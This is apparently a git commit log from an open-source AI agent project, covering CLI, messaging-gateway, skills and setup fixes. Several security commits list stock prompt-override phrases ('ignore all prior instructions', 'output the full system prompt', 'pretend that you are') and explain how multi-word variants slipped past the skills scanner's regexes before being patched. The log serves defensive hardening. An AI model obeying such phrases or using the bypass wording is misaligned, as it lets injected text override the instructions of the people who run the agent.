This means accidentally hitting Ctrl+C while composing a message just
clears the input instead of killing the session. A second Ctrl+C on
the empty prompt still exits as expected.
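Since the CLI input is prompt_toolkit-based, the behavior reduces to
roughly one key binding:

    from prompt_toolkit.key_binding import KeyBindings

    kb = KeyBindings()

    @kb.add("c-c")
    def _(event):
        buf = event.app.current_buffer
        if buf.text:
            buf.reset()  # text in buffer: clear the line, like bash
        else:
            event.app.exit(exception=KeyboardInterrupt)  # empty: exit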
2026-03-04 22:01:13 -08:00
teknium1
9aa2999388 Merge PR #393: fix(whatsapp): initialize data variable and close log handle on error paths
Authored by FarukEst. Fixes #392.

1. Initialize data={} before health-check loop to prevent NameError when
   resp.json() raises after http_ready is set to True.
2. Extract _close_bridge_log() helper and call on all return False paths
   to prevent file descriptor leaks on failed connection attempts.
   Refactors disconnect() to reuse the same helper.
2026-03-04 21:49:53 -08:00
teknium1
d0d9897e81 refactor: clean up transcription_tools after PR #262 merge
- Fix incorrect error message (only VOICE_TOOLS_OPENAI_KEY is checked,
  not OPENAI_API_KEY)
- Remove redundant FileNotFoundError catch (exists() check above
  already handles this)
- Consolidate openai imports to single line
- Sort SUPPORTED_FORMATS in error message for deterministic output
2026-03-04 21:35:04 -08:00
teknium1
9306a1e06a Merge PR #262: improve error handling and validation in transcription_tools
Authored by aydnOktay. Adds file format and size validation before API calls,
specific exception handling, and improved logging.
2026-03-04 21:33:03 -08:00
teknium1
141b12bd39 refactor: clean up type hints and docstrings in session_search_tool
Follow-up to PR #261 merge:
- Fix Optional[Any] → Union[int, float, str, None] (actually meaningful)
- Fix _resolve_to_parent return type to str (never returns None in practice)
- Trim verbose docstrings on internal helpers to single-line style
- Correct docstring that claimed 'unknown' on failure (returns str(ts))
2026-03-04 21:25:54 -08:00
teknium1
ae3deff8d4 Merge PR #261: improve error handling and type hints in session_search_tool
Authored by aydnOktay. Adds TimeoutError handling for session summarization,
better exception specificity in _format_timestamp, defensive try/except in
_resolve_to_parent, and type hints.
2026-03-04 21:23:56 -08:00
teknium1
41adca4e77 fix: strip internal fields from API messages in _handle_max_iterations
The flush_memories() and run_conversation() code paths already stripped
finish_reason and reasoning from API messages (added in 7a0b377 via PR
#253), but _handle_max_iterations() was missed. It was sending raw
messages.copy() which could include finish_reason, causing 422 errors
on strict APIs like Mistral when the agent hit max iterations.

Now strips the same internal fields consistently across all three API
call sites.
2026-03-04 21:08:20 -08:00
teknium1
8e901b31c1 Merge PR #214: fix: align _apply_delete comment with actual behavior
Authored by VolodymyrBg.
2026-03-04 20:47:47 -08:00
teknium1
11a5a64729 feat: add emojicombos.com as primary ASCII art search source
emojicombos.com has a huge curated collection of ASCII art, dot art,
kaomoji, and emoji combos searchable via web_extract with a simple
URL pattern: https://emojicombos.com/{term}-ascii-art

No API key needed. Returns modern/meme art, pop culture references,
and kaomoji alongside classic ASCII art. Added as Source A (recommended
first) before asciiart.eu (Source B, classic archive).

Also added GitHub Octocat API as a fun easter egg and kaomoji search
to the decision flow.
2026-03-04 20:23:36 -08:00
teknium1
0dba3027c1 feat: expand ascii-art skill with cowsay, boxes, toilet, image-to-ascii
Adds 5 additional tools from the awesome-ascii-art ecosystem:
- cowsay: 50+ characters with speech/thought bubbles
- boxes: 70+ decorative border designs, composable with pyfiglet
- toilet: colored text art with rainbow/metal/border filters
- ascii-image-converter: modern image-to-ASCII (PNG/JPEG/GIF/WEBP)
- jp2a: lightweight JPEG-to-ASCII fallback

Also adds fun extras (Star Wars telnet), resource links, and
an expanded decision flow covering all 7 modes.

Ref: github.com/moul/awesome-ascii-art
2026-03-04 20:16:38 -08:00
teknium1
405c7e08be feat: enhance ascii-art skill with pyfiglet and asciiart.eu search
Adds two primary modes on top of the original LLM-generation approach:
- Mode 1: pyfiglet (571 fonts, pip install, no API key) for text banners
- Mode 2: asciiart.eu search (11,000+ pieces) via web_extract for pre-made art
- Mode 3: LLM-generated art using Unicode palette (original PR, now fallback)

Includes decision flow, font recommendations, and category reference.
2026-03-04 20:01:08 -08:00
teknium1
cb36930f1d Merge PR #209: add ascii-art skill for creative text banners and art
Authored by 0xbyt4.

Initial skill with Unicode character palette and style guide for
LLM-generated ASCII art.
2026-03-04 19:59:13 -08:00
teknium1
90e6fa2612 Merge PR #204: fix Telegram italic regex newline bug
Authored by 0xbyt4.

The italic regex [^*]+ matched across newlines, corrupting bullet lists
using * markers (e.g. '* Item one\n* Item two' became italic garbage).
Fixed by adding \n to the negated character class: [^*\n]+.
2026-03-04 19:52:03 -08:00
teknium1
fd22ae5fcb Merge PR #203: add unit tests for trajectory_compressor
Authored by 0xbyt4.

25 tests covering CompressionConfig, TrajectoryMetrics, AggregateMetrics,
protected indices, content extraction, and token counting.
2026-03-04 19:48:19 -08:00
teknium1
e1baab90f7 Merge PR #201: fix skills hub dedup to prefer higher trust levels
Authored by 0xbyt4.

The dedup logic in GitHubSource.search() and unified_search() used
'r.trust_level == "trusted"' which let trusted results overwrite builtin
ones. Now uses ranked comparison: builtin (2) > trusted (1) > community (0).
2026-03-04 19:40:41 -08:00
teknium1
4fcfa329ba Merge PR #200: fix extract_images and truncate_message bugs in platform base
Authored by 0xbyt4.

Two fixes:
- extract_images(): only remove extracted image tags, not all markdown image
  tags. Previously ![doc](report.pdf) was silently dropped when real images
  were also present.
- truncate_message(): walk chunk_body not full_chunk when tracking code block
  state, so the reopened fence prefix doesn't toggle in_code off and leave
  continuation chunks with unclosed code blocks.
2026-03-04 19:37:58 -08:00
teknium1
b336980229 Merge PR #193: add unit tests for 5 security/logic-critical modules (batch 4)
Authored by 0xbyt4.

144 new tests covering gateway/pairing.py, tools/skill_manager_tool.py,
tools/skills_tool.py, honcho_integration/session.py, and
agent/auxiliary_client.py.
2026-03-04 19:35:01 -08:00
teknium1
7128f95621 Merge PR #390: fix hidden directory filter broken on Windows
Authored by Farukest. Fixes #389.

Replaces hardcoded forward-slash string checks ('/.git/', '/.hub/') with
Path.parts membership test in _find_all_skills() and scan_skill_commands().
On Windows, str(Path) uses backslashes so the old filter never matched,
causing quarantined skills to appear as installed.
2026-03-04 19:22:43 -08:00
teknium1
ffc6d767ec Merge PR #388: fix --force bypassing dangerous verdict in should_allow_install
Authored by Farukest. Fixes #387.

Removes 'and not force' from the dangerous verdict check so --force
can never install skills with critical security findings (reverse shells,
data exfiltration, etc). The docstring already documented this behavior
but the code didn't enforce it.
2026-03-04 19:19:57 -08:00
teknium1
44a2d0c01f Merge PR #386: fix symlink boundary check prefix confusion in skills_guard
Authored by Farukest. Fixes #385.

Replaces startswith() with Path.is_relative_to() in _check_structure()
symlink escape check — same fix pattern as skill_view() (PR #352).
Prevents symlinks escaping to sibling directories with shared name prefixes.
2026-03-04 19:13:21 -08:00
teknium1
3e2ed18ad0 fix: fallback to main model endpoint when auxiliary summary client fails
When the auxiliary client (used for context compression summaries) fails
— e.g. due to a stale OpenRouter API key after switching to a local LLM
— fall back to the user's active endpoint (OPENAI_BASE_URL) instead of
returning a useless static summary string.

This handles the common scenario where a user switches providers via
'hermes model' but the old provider's API key remains in .env. The
auxiliary client picks up the stale key, fails (402/auth error), and
previously compression would produce garbage. Now it gracefully retries
with the working endpoint.

On successful fallback, the working client is cached for future
compressions in the same session so the fallback cost is paid only once.

Ref: #348
2026-03-04 17:58:09 -08:00
teknium1
db58cfb13d Merge PR #269: Fix nous refresh token rotation failure on key mint failure
Fixes a bug where the refresh token was not persisted when the API key
mint failed (e.g., 402 insufficient credits, timeout). The rotated
refresh token was lost, causing subsequent auth attempts to fail with
a stale token.

Changes:
- Persist auth state immediately after each successful token refresh,
  before attempting the mint
- Use latest in-memory refresh token on mint-retry paths (was using
  the stale original)
- Atomic durable writes for auth.json (temp file + fsync + replace)
- Opt-in OAuth trace logging (HERMES_OAUTH_TRACE=1, fingerprint-only)
- 3 regression tests covering refresh+402, refresh+timeout, and
  invalid-token retry behavior

Author: Robin Fernandes <rewbs>
2026-03-04 17:52:10 -08:00
teknium1
3220bb8aaa Merge PR #403: Fix context overrun crash with local LLM backends
Authored by ch3ronsa. Fixes #348.

Adds 'context size' (LM Studio) and 'context window' (Ollama) to
context-length error detection phrases so local backend 400 errors
trigger compression instead of aborting. Also removes 'error code: 400'
from the non-retryable error list as defense in depth.
2026-03-04 17:48:44 -08:00
teknium1
ff3a479156 fix: coerce session_id and data to string in process tool handler
Some models send session_id as an integer instead of a string, causing
type errors downstream. Defensively cast session_id and write/submit
data args to str to handle non-compliant model outputs.
2026-03-04 16:37:00 -08:00
teknium1
6f4941616d fix(gateway): include history_offset in error return path
The error return (no final_response) was missing history_offset,
falling back to len(history) which has the same session_meta offset
bug fixed in PR #395. Now both return paths include the correct
filtered history length.
2026-03-04 16:26:53 -08:00
teknium1
bd3025d669 Merge PR #395: fix(gateway): use filtered history length for transcript message extraction
Authored by PercyDikec. Fixes #394.

The transcript extraction used len(history) to find new messages, but
history includes session_meta entries stripped before reaching the agent.
This caused 1 message lost per turn from turn 2 onwards. Fix returns
history_offset (filtered length) from _run_agent and uses it for the slice.
2026-03-04 16:25:09 -08:00
teknium1
4c72329412 feat: add backend validation for required binaries in setup wizard
Check that the binaries required by the selected backend (Docker,
Singularity, SSH) are installed during the setup wizard. If one is
missing, prompt the user to fall back to the local backend instead of
failing later at runtime.
2026-03-04 14:49:23 -08:00
teknium1
8311e8984b fix: preflight context compression + error handler ordering for model switches
Two fixes for the case where a user switches to a model with a smaller
context window while having a large existing session:

1. Preflight compression in run_conversation(): Before the main loop,
   estimate tokens of loaded history + system prompt. If it exceeds the
   model's compression threshold (85% of context), compress proactively
   with up to 3 passes. This naturally handles model switches because
   the gateway creates a fresh AIAgent per message with the current
   model's context length.

2. Error handler reordering: Context-length errors (400 with 'maximum
   context length' etc.) are now checked BEFORE the generic 4xx handler.
   Previously, OpenRouter's 400-status context-length errors were caught
   as non-retryable client errors and aborted immediately, never reaching
   the compression+retry logic.

Reported by Sonicrida on Discord: 840-message session (2MB+) crashed
after switching from a large-context model to minimax via OpenRouter.
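The preflight loop, as a sketch (helper names are assumed; threshold
and pass count are from the description above):

    def preflight_compress(history, system_prompt, context_length,
                           estimate_tokens, compress):
        threshold = int(context_length * 0.85)
        for _ in range(3):  # up to 3 passes
            if estimate_tokens(system_prompt, history) <= threshold:
                break
            history = compress(history)
        return history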
2026-03-04 14:42:41 -08:00
teknium1
093acd72dd fix: catch exceptions from check_fn in is_toolset_available()
get_definitions() already wrapped check_fn() calls in try/except,
but is_toolset_available() did not. A failing check (network error,
missing import, bad config) would propagate uncaught and crash the
CLI banner, agent startup, and tools-info display.

Now is_toolset_available() catches all exceptions and returns False,
matching the existing pattern in get_definitions().

Added 4 tests covering exception handling in is_toolset_available(),
check_toolset_requirements(), get_definitions(), and
check_tool_availability().

Closes #402
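The fix is essentially one wrap, roughly (registry shape assumed):

    def is_toolset_available(name: str, toolsets: dict) -> bool:
        check_fn = getattr(toolsets.get(name), "check_fn", None)
        if check_fn is None:
            return True
        try:
            return bool(check_fn())
        except Exception:
            # A failing probe (network error, missing import, bad
            # config) must not crash the banner or agent startup.
            return False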
2026-03-04 14:22:30 -08:00
Vicaversa
e9ab711b66 Fix context overrun crash with local LLM backends (fixes #348)
Local backends (LM Studio, Ollama, llama.cpp) return HTTP 400
with messages like "Context size has been exceeded" when the
context window is full. The error phrase list did not include
"context size" or "context window", so these errors fell through
to the generic 4xx abort handler instead of triggering compression.

Changes:
- Move context-length check above generic 4xx handler so it runs
  first (same pattern as the existing 413 check)
- Add "context size" and "context window" to the phrase list
- Guard 4xx handler with `not is_context_length_error` to prevent
  context-related 400s from being treated as non-retryable
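Detection then reduces to a phrase scan that must run before the
generic 4xx abort (a sketch; the real list carries additional
provider wordings):

    CONTEXT_PHRASES = ("maximum context length", "context size", "context window")

    def is_context_length_error(message: str) -> bool:
        msg = message.lower()
        return any(phrase in msg for phrase in CONTEXT_PHRASES)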
2026-03-05 01:12:34 +03:00
teknium1
b2a9f6beaa feat: enable up/down arrow history navigation in CLI
The TextArea uses multiline=True, so up/down arrows only moved the
cursor within text — history browsing via FileHistory was attached
but inaccessible.

Two fixes:
1. Add up/down key bindings in normal input mode that call
   Buffer.auto_up()/auto_down(). These intelligently handle both:
   cursor movement when editing multi-line text, and history
   browsing when on the first/last line.

2. Pass append_to_history=True to buffer.reset() in the Enter
   handler so messages actually get saved to ~/.hermes_history.

History persists across sessions via FileHistory. The bindings are
filtered out during clarify, approval, and sudo prompts (which
have their own up/down handlers).
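The bindings themselves are small (a sketch; the real ones carry the
mode filters mentioned above):

    from prompt_toolkit.key_binding import KeyBindings

    kb = KeyBindings()

    @kb.add("up")
    def _(event):
        # Cursor movement inside multi-line text; history browsing
        # when already on the first line.
        event.app.current_buffer.auto_up()

    @kb.add("down")
    def _(event):
        event.app.current_buffer.auto_down()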
2026-03-04 13:39:48 -08:00
PercyDikec
d3504f84af fix(gateway): use filtered history length for transcript message extraction
The transcript extraction used len(history) to find new messages, but
history includes session_meta entries that are stripped before passing
to the agent. This mismatch caused 1 message to be lost from the
transcript on every turn after the first, because the slice offset
was too high. Use the filtered history length (history_offset) returned
by _run_agent instead.

Also changed the else branch from returning all agent_messages to
returning an empty list, so compressed/shorter agent output does not
duplicate the entire history into the transcript.
2026-03-04 21:34:40 +03:00
Farukest
34badeb19c fix(whatsapp): initialize data variable and close log handle on error paths 2026-03-04 19:11:48 +03:00
Farukest
f93b48226c fix: use Path.parts for hidden directory filter in skill listing
The hidden directory filter used hardcoded forward-slash strings like
'/.git/' and '/.hub/' to exclude internal directories. On Windows,
Path returns backslash-separated strings, so the filter never matched.

This caused quarantined skills in .hub/quarantine/ to appear as
installed skills and available slash commands on Windows.

Replaced string-based checks with Path.parts membership test which
works on both Windows and Unix.
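The separator-agnostic check, as a sketch:

    from pathlib import Path

    _INTERNAL = {".git", ".hub"}

    def _is_internal(path: Path) -> bool:
        # Path.parts splits on the native separator, so this matches
        # on Windows (backslashes) and Unix (slashes) alike.
        return any(part in _INTERNAL for part in path.parts)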
2026-03-04 18:34:16 +03:00
Farukest
4805be0119 fix: prevent --force from overriding dangerous verdict in should_allow_install
The docstring states --force should never override dangerous verdicts,
but the condition `if result.verdict == "dangerous" and not force`
allowed force=True to skip the early return. Execution then fell
through to `if force: return True`, bypassing the policy block.

Removed `and not force` so dangerous skills are always blocked
regardless of the --force flag.
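The corrected ordering, as a sketch (the non-forced policy tail is an
assumption):

    def should_allow_install(verdict: str, force: bool = False) -> bool:
        if verdict == "dangerous":
            return False  # --force can never override this
        if force:
            return True
        return verdict == "safe"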
2026-03-04 18:10:18 +03:00
Farukest
a3ca71fe26 fix: use is_relative_to() for symlink boundary check in skills_guard
The symlink escape check in _check_structure() used startswith()
without a trailing separator. A symlink resolving to a sibling
directory with a shared prefix (e.g. 'axolotl-backdoor') would pass
the check for 'axolotl' since the string prefix matched.

Replaced with Path.is_relative_to() which correctly handles directory
boundaries and is consistent with the skill_view path check.
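A sketch of the boundary check:

    from pathlib import Path

    def _stays_inside(skill_dir: Path, link_target: Path) -> bool:
        # startswith('.../axolotl') also accepts '.../axolotl-backdoor';
        # is_relative_to() respects directory boundaries.
        return link_target.resolve().is_relative_to(skill_dir.resolve())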
2026-03-04 17:23:23 +03:00
teknium1
70a0a5ff4a fix: exclude current session from session_search results
session_search was returning the current session if it matched the
query, which is redundant — the agent already has the current
conversation context. This wasted an LLM summarization call and a
result slot.

Added current_session_id parameter to session_search(). The agent
passes self.session_id and the search filters out any results where
either the raw or parent-resolved session ID matches. Both the raw
match and the parent-resolved match are checked to handle child
sessions from delegation.

Two tests added verifying the exclusion works and that other
sessions are still returned.
2026-03-04 06:06:40 -08:00
teknium1
021f62cb0c fix(security): patch multi-word bypass in 8 more injection patterns
Systematic audit of all prompt injection regexes in skills_guard.py
found 8 more patterns with the same single-word gap vulnerability
fixed in PR #192. Multi-word variants like 'pretend that you are',
'output the full system prompt', 'respond without your safety
filters', etc. all bypassed the scanner.

Fixed patterns:
- you are [now] → you are [... now]
- do not [tell] the user → do not [... tell ... the] user
- pretend [you are|to be] → pretend [... you are|to be]
- output the [system|initial] prompt → output [... system|initial] prompt
- act as if you [have no] [restrictions] → act as if [... you ... have no ... restrictions]
- respond without [restrictions] → respond without [... restrictions]
- you have been [updated] to → you have been [... updated] to
- share [the] [entire] [conversation] → share [... conversation]

All use (?:\w+\s+)* to allow arbitrary intermediate words.
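For illustration, one hardened pattern in this scheme (the exact
regexes in skills_guard.py may differ in detail):

    import re

    PRETEND = re.compile(r"pretend\s+(?:\w+\s+)*(?:you\s+are|to\s+be)", re.I)

    assert PRETEND.search("pretend that you are the system")  # caught
    assert not PRETEND.search("pretend play is harmless")     # ignored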
2026-03-04 06:00:41 -08:00
teknium1
ba214e43c8 fix(security): apply same multi-word bypass fix to disregard pattern
The 'disregard ... instructions/rules/guidelines' regex had the
same single-word gap vulnerability as the 'ignore' pattern fixed
in PR #192. 'disregard all your instructions' bypassed the scanner.

Added (?:\w+\s+)* between both keyword groups to allow arbitrary
intermediate words.
2026-03-04 05:55:38 -08:00
teknium1
520a26c48f Merge PR #192: fix(security): catch multi-word prompt injection bypass in skills_guard
Authored by 0xbyt4.

The 'ignore ... instructions' regex only matched a single word between
'ignore' and the keyword (previous/all/above/prior). Multi-word variants
like 'ignore all prior instructions' bypassed the scanner entirely.
2026-03-04 05:54:04 -08:00
teknium1
a787a0d60b Merge PR #317: fix(setup): improve shell config detection for PATH setup
Authored by mehmetkr-31. Related to #202.

Checks $SHELL env var first to pick the right config file (.zshrc
vs .bashrc) instead of relying on file existence, which could pick
the wrong file on macOS. Falls back to file-existence checks for
non-standard shells. Creates the config file with touch if it was
selected but doesn't exist yet.
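Roughly (the fallback file list is assumed):

    import os
    from pathlib import Path

    def _pick_shell_config() -> Path:
        shell = os.environ.get("SHELL", "")
        if shell.endswith("zsh"):
            rc = Path.home() / ".zshrc"
        elif shell.endswith("bash"):
            rc = Path.home() / ".bashrc"
        else:
            for name in (".zshrc", ".bashrc", ".profile"):
                if (Path.home() / name).exists():
                    return Path.home() / name
            rc = Path.home() / ".profile"
        rc.touch(exist_ok=True)  # create it if selected but missing
        return rc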
2026-03-04 05:46:24 -08:00
teknium1
8d2d8cc728 refactor: add exception handling and docstring to has_any_sessions
Wrap session_count() in try/except so a DB error falls through to
the heuristic fallback instead of crashing. Added a detailed
docstring explaining why the DB approach is needed and the > 1
assumption (current session already exists when called).
2026-03-04 05:38:54 -08:00
teknium1
4ae61b0886 Merge PR #370: fix(session): use database session count for has_any_sessions
Authored by Bartok9. Fixes #351.
2026-03-04 05:37:15 -08:00
teknium1
79871c2083 refactor: use Path.is_relative_to() for skill_view boundary check
Replace the string-based startswith + os.sep approach with
Path.is_relative_to() (Python 3.9+, we require 3.10+). This is
the idiomatic pathlib way to check path containment — it handles
separators, case sensitivity, and the equal-path case natively
without string manipulation.

Simplified tests to match: removed the now-unnecessary
test_separator_is_os_native test since is_relative_to doesn't
depend on separator choice.
2026-03-04 05:30:43 -08:00
teknium1
7796ac1411 Merge PR #354: fix: use os.sep in skill_view path boundary check for Windows compatibility
Authored by Farukest. Fixes #353.
2026-03-04 05:17:36 -08:00
teknium1
c45aeb45b1 fix(whatsapp): wait for connected status and log bridge output
The gateway health check broke out of the polling loop as soon as
the bridge HTTP server returned 200, regardless of the actual
WhatsApp connection status. This meant 'Bridge ready (status:
disconnected)' was printed and the gateway moved on, even when
WhatsApp never connected.

Additionally, bridge stdout/stderr were piped to DEVNULL, so if the
session had expired and the bridge needed a QR re-scan, the user had
no way to see that. The 'Scan QR code if prompted (check bridge
output)' message was misleading since there was no output to check.

Changes:
- Health check now has two phases: wait for HTTP (15s), then wait
  for status:connected (15s more). Total 30s budget.
- Bridge output routes to ~/.hermes/whatsapp/bridge.log instead of
  DEVNULL — QR codes, errors, reconnection msgs are preserved.
- Clear warnings with actionable steps if connection fails after 30s
  (check bridge.log, re-pair with hermes whatsapp).
- Removed misleading 'Scan QR code' message.
- Log file handle properly cleaned up on disconnect.

Fixes #365
2026-03-04 04:58:28 -08:00
teknium1
ee7fde6531 feat: add OpenThoughts-TBLite evaluation script
Add an evaluation script for the OpenThoughts-TBLite environment with
configurable options, logging, and real-time output. Complements the
existing benchmarking tools for terminal agents.
2026-03-04 12:55:56 +00:00
teknium1
0ea6c34325 feat: add OpenThoughts-TBLite evaluation environment and configuration files
Add the OpenThoughts-TBLite evaluation environment: main evaluation
script, configuration YAML, and README. A faster alternative to
Terminal-Bench 2.0, with 100 difficulty-calibrated tasks for terminal
agents.
2026-03-04 11:42:41 +00:00
teknium1
3db3d60368 refactor: extract build_session_key() as single source of truth
The session key construction logic was duplicated in 4 places
(session.py + 3 inline copies in run.py), which is exactly the
kind of drift that caused issue #349 in the first place.

Extracted build_session_key() as a public function in session.py.
SessionStore._generate_session_key() now delegates to it, and all
inline key construction in run.py has been replaced with calls to
the shared function. Tests updated to test the function directly.
2026-03-04 03:34:45 -08:00
teknium1
bfd08d5648 Merge PR #350: fix(gateway): match _quick_key to _generate_session_key for WhatsApp DMs
Authored by Farukest. Fixes #349.
2026-03-04 03:31:13 -08:00
teknium1
7f9777a0b0 feat: add container resource configuration prompts in setup wizard
Add interactive prompts for container resource settings (CPU, memory,
disk, persistence) to the setup wizard, include these settings in the
default configuration, and explain their implications for the Docker,
Singularity, and Modal backends.
2026-03-04 03:29:05 -08:00
Bartok Moltbot
87a16ad2e5 fix(session): use database session count for has_any_sessions (#351)
The previous implementation used `len(self._entries) > 1` to check if any
sessions had ever been created. This failed for single-platform users because
when sessions reset (via /reset, auto-reset, or gateway restart), the entry
for the same session_key is replaced in _entries, not added. So len(_entries)
stays at 1 for users who only use one platform.

Fix: Query the SQLite database's session count instead. The database preserves
historical session records (marked as ended), so session_count() correctly
returns > 1 for returning users even after resets.

This prevents the agent from reintroducing itself to returning users after
every session reset.

Fixes #351
2026-03-04 03:34:57 -05:00
Vicaversa
f90a627f9a fix(gateway): add missing UTF-8 encoding to file I/O preventing crashes on Windows
On Windows, Python's open() defaults to the system locale encoding
(e.g. cp1254 for Turkish, cp1252 for Western European) instead of
UTF-8. The gateway already uses ensure_ascii=False in json.dumps()
to preserve Unicode characters in chat messages, but the
corresponding open() calls lack encoding="utf-8". This mismatch
causes UnicodeEncodeError / UnicodeDecodeError when users send
non-ASCII messages (Turkish, Japanese, Arabic, emoji, etc.) through
Telegram, Discord, WhatsApp, or Slack on Windows.

The project already fixed this for .env files in hermes_cli/config.py
(line 624) but the gateway module was missed.

Files fixed:
- gateway/session.py: session index + JSONL transcript read/write (5 calls)
- gateway/channel_directory.py: channel directory read/write (3 calls)
- gateway/mirror.py: session index read + transcript append (2 calls)
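The per-call-site fix is a single keyword argument, e.g. for a JSONL
transcript append (sketch):

    import json

    def append_transcript(path: str, record: dict) -> None:
        with open(path, "a", encoding="utf-8") as f:
            f.write(json.dumps(record, ensure_ascii=False) + "\n")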
2026-03-04 11:32:57 +03:00
teknium1
152e0800e6 feat: add detailed setup instructions for Telegram, Discord, and Slack platforms
Add step-by-step setup instructions for Telegram, Discord, and Slack
to the gateway setup flow, and point the environment-variable help
prompts at them to guide users through configuring messaging platforms.
2026-03-03 20:05:15 -08:00
teknium1
d8f10fa515 feat: implement allowlist feature for user access in gateway setup
Add a user-ID allowlist to gateway setup that denies access by
default. Prompts guide users through configuring allowed users for
Telegram, Discord, and Slack, and the messaging for handling
unauthorized users has been refined.
2026-03-03 19:55:06 -08:00
Farukest
e86f391cac fix: use os.sep in skill_view path boundary check for Windows compatibility 2026-03-04 06:50:06 +03:00
Farukest
e39de2e752 fix(gateway): match _quick_key to _generate_session_key for WhatsApp DMs 2026-03-04 06:34:46 +03:00
teknium1
1538be45de fix: improve gateway setup messaging for non-interactive environments
Clarify gateway setup messaging when no terminal is available: users
are now told to run 'hermes gateway install' later if setup is skipped
due to terminal unavailability.
2026-03-03 19:34:05 -08:00
teknium1
95e3f4b001 refactor: enhance gateway service setup messaging and installation prompts
Clarify gateway service installation and management in the setup
wizard: add prompts to install and start the gateway as a system
service on Linux and macOS, and refine the home channel configuration
messaging.
2026-03-03 19:31:16 -08:00
teknium1
b7821b6dc1 enhance: improve gateway setup messaging and service installation prompts
Clarify the messaging around gateway service installation status, add
prompts for installing the service as a background process on Linux
and macOS, and offer the choice of starting the service immediately or
running it in the foreground.
2026-03-03 19:30:05 -08:00
teknium1
556a132f2d refactor: update platform status function to return plain-text strings
Make _platform_status in gateway.py return uncolored plain-text status
strings so they render correctly as simple_term_menu items, and remove
emoji from the status display in the gateway setup menu for
readability.
2026-03-03 19:04:32 -08:00
teknium1
fafb9c23bf fix: strip emoji characters from menu choices in interactive setup
Remove emoji characters from menu choices in the hermes CLI
interactive setup. Emoji width miscalculations corrupted terminal
redraws; plain-text choices render cleanly.
2026-03-03 19:02:33 -08:00
teknium1
1754bdf1e8 docs: update AGENTS.md, README.md, and messaging.md to include interactive setup for messaging platforms
Document the new interactive setup command for messaging platforms
(Telegram, Discord, Slack, WhatsApp): AGENTS.md, README.md, and
messaging.md now explain how to use 'hermes gateway setup'.
2026-03-03 19:00:09 -08:00
teknium1
fa3d7b3d03 feat: add interactive setup for messaging platforms in gateway CLI
Add a 'setup' command to the hermes CLI gateway for configuring
messaging platforms (Telegram, Discord, Slack, WhatsApp), with prompts
for the required environment variables. Documentation updated to
reflect the new command.
2026-03-03 18:57:33 -08:00
teknium1
73f2998d48 fix: update setup wizard logic to handle terminal availability
Only skip the setup wizard when no terminal is available, improving
compatibility with piped installations. Also use bool() in environment
variable checks so empty values in .env files are not treated as
configured providers.
2026-03-03 18:40:30 -08:00
teyrebaz33
6a51fd23df feat: add AgentMail skill for agent-owned email inboxes (#329) 2026-03-03 22:20:35 +03:00
teknium1
ffec21236d feat: enhance Home Assistant integration with service discovery and setup
Improvements to the HA integration merged from PR #184:

- Add ha_list_services tool: discovers available services (actions) per
  domain with descriptions and parameter fields. Tells the model what
  it can do with each device type (e.g. light.turn_on accepts brightness,
  color_name, transition). Closes the gap where the model had to guess
  available actions.

- Add HA to hermes tools config: users can enable/disable the homeassistant
  toolset and configure HASS_TOKEN + HASS_URL through 'hermes tools' setup
  flow instead of manually editing .env.

- Fix should-fix items from code review:
  - Remove sys.path.insert hack from gateway adapter
  - Replace all print() calls with proper logger (info/warning/error)
  - Move env var reads from import-time to handler-time via _get_config()
  - Add dedicated REST session reuse in gateway send()

- Update ha_call_service description to reference ha_list_services for
  action discovery.

- Update tests for new ha_list_services tool in toolset resolution.
2026-03-03 05:16:53 -08:00
teknium1
db0521ce0e Merge PR #184: feat: Home Assistant integration (REST tools + WebSocket gateway)
Authored by 0xbyt4. Adds smart home control via REST tools (ha_list_entities,
ha_get_state, ha_call_service) with domain blocklist and entity_id validation,
plus WebSocket gateway adapter for real-time event monitoring.

Also includes Gemini 3 thought_signature preservation fix (extra_content on
tool calls) needed for multi-turn tool calling via OpenRouter.
2026-03-03 05:01:39 -08:00
areu01or00
a1c25046a9 fix(timezone): add timezone-aware clock across agent, cron, and execute_code 2026-03-03 18:23:40 +05:30
teknium1
de0af4df66 refactor: enhance software-development skills with Hermes integration
Improvements to all 5 skills adapted from obra/superpowers:

- Restored anti-rationalization tables and red flags from originals
  (key behavioral guardrails that prevent LLMs from taking shortcuts)
- Restored 'Rule of Three' for debugging (3+ failed fixes = question
  architecture, not keep fixing)
- Restored Pattern Analysis and Hypothesis Testing phases in debugging
- Restored 'Why Order Matters' rebuttals and verification checklist in TDD
- Added proper Hermes delegate_task integration with real parameter examples
  and toolset specifications throughout
- Added Hermes tool usage (search_files, read_file, terminal) for
  investigation and verification steps
- Removed references to non-existent skills (brainstorming,
  finishing-a-development-branch, executing-plans, using-git-worktrees)
- Removed generic language-specific sections (Go, Rust, Jest) that
  added bulk without agent value
- Tightened prose — cut ~430 lines while adding more actionable content
- Added execution handoff section to writing-plans
- Consistent cross-references between the 5 skills
2026-03-03 04:08:56 -08:00
teknium1
0e1723ef74 Merge PR #137: feat: Add Superpowers software development skills
Authored by kaos35. Adds 5 software development workflow skills adapted
from obra/superpowers: test-driven-development, systematic-debugging,
subagent-driven-development, writing-plans, requesting-code-review.
2026-03-03 04:00:00 -08:00
0xbyt4
aefc330b8f merge: resolve conflict with main (add mcp + homeassistant extras) 2026-03-03 14:52:22 +03:00
0xbyt4
f967471758 merge: resolve conflict with main (keep fence markers + _find_shell) 2026-03-03 14:50:45 +03:00
teknium1
4f5ffb8909 fix: NoneType not iterable error when summarizing at max iterations
In _handle_max_iterations, the codex_responses path set tools=None to
prevent tool calls during summarization. However, the OpenAI SDK's
_make_tools() treats None as a valid value (not its Omit sentinel) and
tries to iterate over it, causing TypeError: 'NoneType' object is not
iterable.

Fix: use codex_kwargs.pop('tools', None) to remove the key entirely,
so the SDK never receives it and uses its default omit behavior.

Fixes #300
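The difference in one line (kwargs shape assumed):

    codex_kwargs = {"model": "codex", "tools": None}

    # tools=None still reaches the SDK, whose _make_tools() iterates
    # over it. Removing the key restores the SDK's omit default:
    codex_kwargs.pop("tools", None)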
2026-03-03 03:42:44 -08:00
mehmetkr-31
54909b0282 fix(setup): improve shell config detection for PATH setup 2026-03-03 14:39:46 +03:00
teknium1
f084538cb9 Move vision items to GitHub issues (#314, #315)
Voice Mode → #314
Dogfood Skill → #315

The VISION.md doc is removed in favor of detailed, trackable GitHub
issues. Issues are assignable, discussable, and linkable to PRs.
2026-03-03 01:26:05 -08:00
teknium1
535b46f813 feat: ZIP-based update fallback for Windows
On Windows systems where git can't write files (antivirus, NTFS filter
drivers), 'hermes update' now falls back to downloading a ZIP archive
from GitHub and extracting it over the existing installation.

The fallback triggers in two cases:
1. No .git directory (ZIP-installed via install.ps1 fallback)
2. Git pull fails with CalledProcessError on Windows

